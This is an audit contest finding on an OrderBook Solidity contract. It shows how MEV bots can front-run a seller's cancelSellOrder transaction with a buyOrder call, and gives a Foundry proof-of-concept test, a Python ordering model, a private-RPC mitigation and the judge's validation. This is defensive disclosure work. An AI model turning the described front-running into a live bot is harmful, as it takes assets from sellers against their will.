OrderBook

First Flight #43
Beginner Friendly, Solidity
Submission Details
Severity: high
Valid

🛡️ MEV bots can front-run the transaction to buy the assets when the seller no longer wants to sell them, i.e. when the seller calls `OrderBook::cancelSellOrder`

Description

Normally a seller can cancel their sell order by calling the `OrderBook::cancelSellOrder` function, which marks the order inactive and returns the escrowed assets. However, an MEV bot can observe the pending cancel transaction in the public mempool and front-run it with a `buyOrder` call for the same order. The buy executes first, the cancel then reverts with `OrderAlreadyInactive`, and the order is sold even though the seller no longer wanted to sell it.

Risk

Likelihood:

  • Reason 1: Whenever a seller calls the `cancelSellOrder` function, or wants to raise the price of their listed assets, the pending transaction is visible in the public mempool and can be front-run.

Impact:

  • Impact 1: The seller is not able to cancel the order and get their assets back.

  • Impact 2: The order is sold when the seller no longer wants to sell their assets.

Proof of Concept

  • The `MevBotAttack` contract simulates a bot front-running the cancel transaction; it can be added to the `TestOrderBook.t.sol` file.

  • `test_MevAttackOnCancelSellOrder` can be added to the existing test suite. In it, Alice creates an order and then tries to cancel it, but the MEV bot has seen the transaction in the mempool and front-runs it to buy the assets.

MevBotAttack Contract

```solidity
// @audit add the following MevBotAttack contract to TestOrderBook.t.sol
contract MevBotAttack is Test {
    OrderBook public book;
    address public usdcHolder;

    constructor(OrderBook _book) {
        book = _book;
    }

    // Simulates a mempool bot that front-runs the seller's cancel by buying the order first.
    function mevBuyOrderInMempool(uint256 orderId) external {
        book.iUSDC().approve(address(book), type(uint256).max);
        book.buyOrder(orderId);
    }
}
```

Test_MevBotAttackOnCancelSellOrder

```solidity
// @audit add the following test to the existing test contract in TestOrderBook.t.sol
function test_MevAttackOnCancelSellOrder() public {
    // Step 1: Alice creates a sell order (2 WBTC for 180,000 USDC, valid for 2 days)
    vm.startPrank(alice);
    wbtc.approve(address(book), 2e8);
    uint256 orderId = book.createSellOrder(
        address(wbtc),
        2e8,
        180_000e6,
        2 days
    );
    vm.stopPrank();

    // Step 2: Deploy and fund the MEV bot
    MevBotAttack mevBot = new MevBotAttack(book);
    vm.startPrank(dan);
    usdc.transfer(address(mevBot), 200_000e6);
    vm.stopPrank();

    // The bot sees Alice's pending cancel in the mempool and front-runs it,
    // so the seller cannot retrieve her assets.
    // Step 3: MEV bot buys the order before the cancel lands
    mevBot.mevBuyOrderInMempool(orderId);

    // Step 4: Alice's cancel now reverts because the order is already inactive
    vm.expectRevert(OrderBook.OrderAlreadyInactive.selector);
    vm.prank(alice);
    book.cancelSellOrder(orderId);

    // Step 5: Assert the outcome
    assert(wbtc.balanceOf(address(mevBot)) == 2e8); // bot holds the asset
    assert(usdc.balanceOf(alice) == 174_600e6);     // Alice was paid the old price minus the fee
    assert(book.totalFees() == 5_400e6);            // 3% protocol fee
}
```

Recommended Mitigation

  • Submit cancel and amend transactions through a private RPC endpoint such as Flashbots Protect RPC, so they are not visible to MEV bots in the public mempool.
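To make the ordering dependency concrete, the following is an added, constructed Python model of the order-book state touched by this finding (not code from the OrderBook project or the original submission). It applies the same two transactions, Alice's `cancelSellOrder` and the bot's `buyOrder`, in block order, first as the public mempool lets the bot arrange them and then as they land when the seller's cancel arrives first (the effect a private relay aims for). The 3% fee and the 2e8 / 180_000e6 amounts are taken from the PoC above; the basis-point fee representation and the names `MiniOrderBook`, `run_block` and `simulate` are assumptions of this model.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

FEE_BPS = 300  # 3% protocol fee as on the page; basis-point encoding is an assumption of this model


class OrderAlreadyInactive(Exception):
    """Mirrors the OrderBook.OrderAlreadyInactive revert named in the PoC."""


@dataclass
class SellOrder:
    seller: str
    amount: int       # escrowed asset units (e.g. WBTC, 8 decimals)
    price_usdc: int   # asking price in USDC units (6 decimals)
    active: bool = True


@dataclass
class MiniOrderBook:
    """Constructed, minimal model: escrow on create, release on cancel, settle on buy."""
    orders: Dict[int, SellOrder] = field(default_factory=dict)
    asset: Dict[str, int] = field(default_factory=dict)
    usdc: Dict[str, int] = field(default_factory=dict)
    total_fees: int = 0
    next_id: int = 1

    def create_sell_order(self, seller: str, amount: int, price_usdc: int) -> int:
        self.asset[seller] = self.asset.get(seller, 0) - amount  # asset moves into escrow
        oid = self.next_id
        self.next_id += 1
        self.orders[oid] = SellOrder(seller, amount, price_usdc)
        return oid

    def cancel_sell_order(self, caller: str, oid: int) -> None:
        order = self.orders[oid]
        if not order.active:
            raise OrderAlreadyInactive(oid)
        if caller != order.seller:
            raise PermissionError("only the seller may cancel")
        order.active = False
        self.asset[caller] = self.asset.get(caller, 0) + order.amount  # escrow returned

    def buy_order(self, buyer: str, oid: int) -> None:
        order = self.orders[oid]
        if not order.active:
            raise OrderAlreadyInactive(oid)
        fee = order.price_usdc * FEE_BPS // 10_000
        self.usdc[buyer] = self.usdc.get(buyer, 0) - order.price_usdc
        self.usdc[order.seller] = self.usdc.get(order.seller, 0) + order.price_usdc - fee
        self.total_fees += fee
        self.asset[buyer] = self.asset.get(buyer, 0) + order.amount
        order.active = False


Tx = Tuple[str, Callable[[], None]]


def run_block(txs: List[Tx]) -> List[Tuple[str, str]]:
    """Apply transactions in the order a block builder sequenced them; a revert
    does not undo earlier transactions, exactly as on-chain."""
    results = []
    for label, fn in txs:
        try:
            fn()
            results.append((label, "ok"))
        except OrderAlreadyInactive:
            results.append((label, "revert:OrderAlreadyInactive"))
    return results


def simulate(bot_front_runs: bool):
    """Alice lists 2 WBTC for 180,000 USDC, then tries to cancel while a bot tries to buy.
    bot_front_runs=True models the public-mempool ordering described in the finding."""
    book = MiniOrderBook(asset={"alice": 2 * 10**8}, usdc={"bot": 200_000 * 10**6})
    oid = book.create_sell_order("alice", 2 * 10**8, 180_000 * 10**6)
    cancel: Tx = ("alice:cancelSellOrder", lambda: book.cancel_sell_order("alice", oid))
    buy: Tx = ("bot:buyOrder", lambda: book.buy_order("bot", oid))
    order = [buy, cancel] if bot_front_runs else [cancel, buy]
    return book, run_block(order)


if __name__ == "__main__":
    for front_run in (True, False):
        book, results = simulate(front_run)
        print("bot front-runs" if front_run else "cancel lands first", results,
              "alice_usdc=", book.usdc.get("alice", 0), "alice_asset=", book.asset.get("alice", 0))
```

With the bot's buy sequenced first, Alice's cancel reverts and she ends up with 174_600e6 USDC and no WBTC, matching the PoC's assertions; with her cancel sequenced first, the buy is the transaction that reverts and her 2e8 WBTC comes back out of escrow.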

Updates

Lead Judging Commences

yeahchibyke Lead Judge 10 days ago
Submission Judgement Published
Validated
Assigned finding tags:

Amends or cancellation of sell orders can be front-run

When a seller wants to amend or cancel their sell orders, a malicious entity can front-run their transactions and buy out the orders. This can be especially harmful when real-world prices of listed assets fluctuate and sellers want to adjust the prices listed in their orders.
